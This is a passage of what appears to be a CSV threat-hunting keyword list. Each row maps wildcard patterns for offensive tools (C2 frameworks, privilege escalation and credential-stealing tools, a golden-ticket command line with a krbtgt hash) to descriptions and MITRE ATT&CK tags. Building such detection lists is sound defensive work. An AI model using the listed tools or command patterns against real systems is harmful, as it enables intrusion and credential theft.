T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" +"*gobfuscate*","offensive_tool_keyword","gobfuscate","When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. This makes a lot of information difficult or impossible to decipher from the binary.","T1027 - T1029 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/unixpickle/gobfuscate","1","0","N/A","N/A","10","1362","191","2021-12-07T22:27:26Z","2016-10-01T20:40:37Z" +"*gobuster dir *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster dir -w *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*gobuster dns*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster fuzz -*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster gcs *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster s3 *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster tftp *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster vhost -u *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster vhost*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster*","offensive_tool_keyword","gobuster","Gobuster is a tool used to brute-force","T1110 - T1114 - T1115 - T1107","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster_*.tar.gz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster_*.zip*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobusterfuzz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobustertftp*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gocrack@password.crackers.local*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*GodFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GodFault\GodFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*godoh -*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*godoh agent*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*godoh c2*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*godoh help*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*godoh receive*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*godoh send*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*godoh test*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*godoh-darwin64*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*godoh-linux64*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*godoh-windows32.*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*godoh-windows64.*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" +"*go-donut/*.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*go-donut/*.go*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*GodPotato -*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*godpotato.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato.git*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotatoContext.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato-master.zip*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato-NET*.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotatoUnmarshalTrigger.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*go-external-c2*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*GoFetchAD/GoFetch*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"*GoFetch-master*","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","1","N/A","10","7","615","126","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" +"*gohaleygoandhackawaythegibson*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*golang_c2-master*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" +"*golden_ticket.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*golden_ticket.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*goldencopy * --password * --stealth --krbtgt 060ee2d06c5648e60a9ed916c9221ad19d90e5fb7b1cccf9d51f540fe991ada1 *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*GoldenGMSA.exe*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" +"*GoldenGMSA-main*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" +"*goldenPac.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*goMatrixC2.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" +"*goMatrixC2-main*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" +"*GooDork*","offensive_tool_keyword","GooDork","GooDork is a simple python script designed to allow you to leverage the power of google dorking straight from the comfort of your command line. GooDork offers powerfull use of googles search directives. by analyzing results from searches using regular expressions that you supply","T1136 - T1560 - T1213","TA0011 - TA0007","N/A","N/A","Information Gathering","https://github.com/k3170makan/GooDork","1","0","N/A","N/A","2","123","39","2013-06-08T23:13:12Z","2012-03-16T22:40:40Z" +"*GoodSync Server*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","Service Name","9","10","N/A","N/A","N/A","N/A" +"*GoodSync-vsub-2Go-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","portable version","9","10","N/A","N/A","N/A","N/A" +"*google-chrome/cookies.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*google-chrome/credit_cards.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*google-chrome/history.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*google-chrome/login_data.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*google-chrome\cookies.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*google-chrome\credit_cards.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*google-chrome\history.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*google-chrome\login_data.txt*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" +"*google-get-pdf-metadata *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*google-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 